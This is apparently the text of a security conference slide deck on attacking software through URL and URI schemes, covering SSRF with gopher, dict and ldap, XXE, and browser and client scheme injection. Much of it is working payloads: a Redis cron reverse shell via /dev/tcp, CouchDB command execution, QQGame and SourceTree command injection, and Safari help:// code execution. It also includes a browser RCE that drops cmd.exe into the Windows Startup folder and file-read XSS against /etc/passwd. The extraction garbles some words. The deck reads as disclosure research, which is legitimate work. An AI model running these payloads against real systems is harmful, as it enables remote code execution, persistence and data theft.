Professional Documents
Culture Documents
Author: redrain
Light4freedom Team
rootredrain@gmail.com 1
PS> whoami
light4freedom
Low-level security researcher
pentester with interest in big guys
Low-level CVE generator
h=p://www.hackdog.me
h=p://l4f.club/
rootredrain@gmail.com 2
Agenda
URL/URI Scheme
Server A0ack Surface Extension
Browser A0ack Surface Extension
URL Scheme Render
rootredrain@gmail.com 3
URL/URI Scheme
URL Scheme URI Scheme
rootredrain@gmail.com 5
rootredrain@gmail.com 6
Interes'ng vulns
iOS autodial
<html>
<head>
<title>iOS webview auto dial demo</title>
<meta http-equiv="refresh" content="1; URL=tel:13888888888">
</head>
<body>
<script>
s = "sms:";
for (i = 0; i < 10000; i++) {
s = s + "18888888888";
};
function rr () {
window.location.href = s;
}
setTimeout("rr()",1300);
</script>
</body>
</html>
rootredrain@gmail.com 7
rootredrain@gmail.com 8
URL schema support for language
rootredrain@gmail.com 9
URL schema support for language
rootredrain@gmail.com 10
URL schema support for browser
rootredrain@gmail.com 11
Firefox data scheme url spoof
rootredrain@gmail.com 12
Firefox data scheme url spoof
rootredrain@gmail.com 13
URL Scheme Render
Registering an Applica/on to a URI Scheme
RCE?XSS?INFOLEAK?
rootredrain@gmail.com 14
URL Scheme Render
CFBundleURLSchemes in Info.plist
rootredrain@gmail.com 15
URL Scheme Render
android:scheme in AndroidManifest.xml
<intent-filter>
<action android:name="android.intent.action.VIEW"></action>
<category android:name="android.intent.category.DEFAULT"></category>
<category android:name="android.intent.category.BROWSABLE"></category>
<data
android:scheme="app"
android:host="test">
</data>
</intent-filter>
rootredrain@gmail.com 16
URL Scheme Render
h"ps://msdn.microso/.com/en-us/library/aa767914(v=vs.85).aspx
HKEY_CLASSES_ROOT
alert
(Default) = "URL:Alert Protocol"
URL Protocol = ""
DefaultIcon
(Default) = "alert.exe,1"
shell
open
command
(Default) = "C:\Program Files\Alert\alert.exe" "%1"
rootredrain@gmail.com 17
Server A'ack Surface Extension
Ge#ng that URL opera0ons are usually inevitable in most of the
exploits and that the replacement of schemes in URL could result in
dierent outcomes
rootredrain@gmail.com 18
SSRF
rootredrain@gmail.com 19
SSRF Extension
rootredrain@gmail.com 20
More Wrappers?
PHP
PHP http://php.net/manual/en/wrappers.php
file:// - Accessing local filesystem
http:// - Accessing HTTP(s) URLs
ftp:// - Accessing FTP(s) URLs
php:// - Accessing various I/O streams
zlib:// - Compression Streams
data:// - Data (RFC 2397)
glob:// - Find pathnames matching pattern
phar:// - PHP Archive
ssh2:// - Secure Shell 2
expect:// - Process Interaction Streams
JAVA
file ftp gopher http https jar mailto netdoc
rootredrain@gmail.com 21
Magic Schemes
gopher h)ps://www.ie0.org/rfc/rfc1436.txt
gopher://host[: port ][/gtype/ [selector] ][ ? search ]
rootredrain@gmail.com 22
Magic Schemes
gopher
POST /rr.php HTTP/1.1
Host: 127.0.0.1
User-Agent: curl/7.35.0
Accept: */*
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
rootredrain@gmail.com 23
A#ack Vuln Web with gopher
rootredrain@gmail.com 24
A#ack Redis with goper
redis-cli -h $1 flushall
echo -e "\n\n*/1 * * * * bash -i >& \
/dev/tcp/192.168.99.177/2333 0>&1\n\n"|\
redis-cli -h $1 -x set 1
redis-cli -h $1 config set dir /var/spool/cron/crontabs
redis-cli -h $1 config set dbfilename root
redis-cli -h $1 save
rootredrain@gmail.com 25
A#ack CouchDB with goper
feature or vulnerability?
CouchDB provide some HTTP REST API
https://wiki.apache.org/couchdb/Complete_HTTP_API_Reference
The option `query_Server` in `local.ini` can invoke external program and API document tell us :
rootredrain@gmail.com 26
A#ack CouchDB with goper
gopher://172.17.0.2:5984/_PUT /_config/query_servers/cmd
HTTP/1.1%0aHost: 172.17.0.2:5984%0aUser-Agent: curl/7.35.0
%0aAccept: */*%0aContent-Length: 22%0aContent-Type:
application/x-www-form-urlencoded%0a%0a%22/usr/bin/id
%3E/tmp/rr%22
gopher://172.17.0.2:5984/_POST /vul/_temp_view?limit=11
HTTP/1.1%0aHost: 172.17.0.2:5984%0aUser-Agent: curl/7.35.0
%0aAccept: */*%0aContent-Type: application/json%0a
Content-Length: 27%0a%0a%7B%22language%22:%22cmd%22,
%22map%22:%22%22%7D%27 -H %27Content-Type: application/json%27
rootredrain@gmail.com 27
A#ack CouchDB with goper
rootredrain@gmail.com 28
Magick Schemes
dict
dict://hostname:port/command
ldap
ldap://hostname:port/%0a%0dcommand%0a%0dcommand
rootredrain@gmail.com 29
SSRF Chain
rootredrain@gmail.com 30
XXE - XML External En.ty
rootredrain@gmail.com 31
XXE Extension
rootredrain@gmail.com 32
More Wrappers?!
rootredrain@gmail.com 33
Browser A)ack Surface Extension
scheme:[//[user:password@]host[:port]][/]path[?query][#fragment]
rootredrain@gmail.com 34
A"ack Surface
Injec'on
scheme://xxx/?injec'on
#@$%^blabla!!!
rootredrain@gmail.com 35
Injec&on
QQGame lead to execute command
qqgameprotocol://shortcut/#
URL= [inject here???] &ICON=1111.ico&NAME=AAAAAAAA
&DESC=BBBBB&TYPE=1&START=1
'&'-->' '('%26'-->'%20')
rootredrain@gmail.com 36
Injec&on
QQGame lead to execute command
payload conjecture
qqgameprotocol://shortcut/#
URL=c:/windows/system32/calc.exe ICON=1111.ico NAME=AAAAAAAA
DESC=BBBBB TYPE=1 START=1
rootredrain@gmail.com 37
Injec&on
QQGame lead to execute command
payload conjecture again
qqgameprotocol://shortcut/#
URL=c:/windows/system32/http://../calc.exe
ICON=1111.ico NAME=AAAAAAAA
DESC=BBBBB TYPE=1 START=1
rootredrain@gmail.com 38
Injec&on
QQGame lead to execute command
payload conjecture again again
qqgameprotocol://shortcut/#
URL=c:/windows/system32/http://qq.com/../../calc.exe
ICON=1111.ico NAME=AAAAAAAA
DESC=BBBBB TYPE=1 START=1
rootredrain@gmail.com 39
Injec&on
QQGame lead to execute command
payload conjecture again again again
qqgameprotocol://shortcut/#
URL=c:/windows/system32/http://qq.com/../../calc.exe
ICON=3366xs.ico NAME=AAAAAAAA
DESC=BBBBB TYPE=1 START=1
rootredrain@gmail.com 40
safari help:// scheme Code Execu1on and Arbitrary File Read
There is a interesting scheme in OS X.`x-help-script://`
We can run AppleScripts from help books, so we could easily create a generic URL launching mechanism this way
x-help-script://com.apple.machelp/scpt/OpnAppBndID.scpt?open,[BundleID]
PoC:
help:///Applications/Safari.app/Contents/Resources/Safari.help/
%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f
/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html
?redirect=javascript%253adocument.write(1);
rootredrain@gmail.com 41
safari help:// scheme Code Execu1on
and Arbitrary File Read
Code Execu*on
var f = document.createElement("iframe");
f.onload = () = >{
f.contentDocument.location =
"x-help-script://com.apple.machelp/scpt/OpnAppBndID.scpt?open,com.apple.Calculator";
};
f.src = "help:openbook=com.apple.iTunes.help";
document.documentElement.appendChild(f);
var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();";
rootredrain@gmail.com 42
Browser private protocol
chrome://mini_download_frame RCE
`Vendor: 115 Browser`
rootredrain@gmail.com 43
Browser private protocol
chrome://mini_download_frame
RCE
window.browserInterface.BatchDownload
FilesToLocal(
["h:p://www.hackdog.me/cmd.exe"],
["..//..//..//Administrator//AppData//
Roaming//MicrosoG//Windows//Start
Menu//Programs//Startup//cmd.exe"],
"test") ;
rootredrain@gmail.com 44
Client registered scheme
sourcetree:// Code Execu3on 0day
PoC:
sourcetree://cloneRepo/ext::[command injection]
rootredrain@gmail.com 45
Client registered scheme
sourcetree:// Code Execu3on 0day
rootredrain@gmail.com 46
URL Scheme Render
scheme:// => <a href="scheme://"> </a >
rootredrain@gmail.com 47
CVE-2016-1764
Detection Links will identify a link in the UIWebView
javascript://www.hackdog.me/%0a%0dprompt(1)
<script>
//www.hackdog.me
prompt(1)
</script>
PoC:
javascript://www.hackdog.me/%0a%0d%28function%28s%29%7B
s.src%3D%27http%3A%2f%2fexample.com%2f1.js%27%3B
document.body.appendChild%28s%29%7D%29%28
document.createElement%28%27script%27%29%29
rootredrain@gmail.com 48
CVE-2016-1764 demo video
rootredrain@gmail.com 49
Airmail URLScheme render and le:// xss vulnerability
rootredrain@gmail.com 50
Airmail URLScheme render and le:// xss
vulnerability
PoC:
javascript://www.baidu.com/research?%0Aprompt(1)
Arbitrary le read:
javascript://www.baidu.com/research?
%0Afunction%20reqListener%20()%20%7B%0A
%20%20prompt(this.responseText)%3B%0A%7D%0A
var%20oReq%20%3D%20new%20XMLHttpRequest()%3B%0A
oReq.addEventListener(%22load%22%2C%20reqListener)%3B%0A
oReq.open(%22GET%22%2C%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22)%3B%0A
oReq.send()%3B
rootredrain@gmail.com 51
Acknowledgement
@superhei
Gainover@PKAV
rootredrain@gmail.com 52
Q&A
rootredrain@gmail.com 53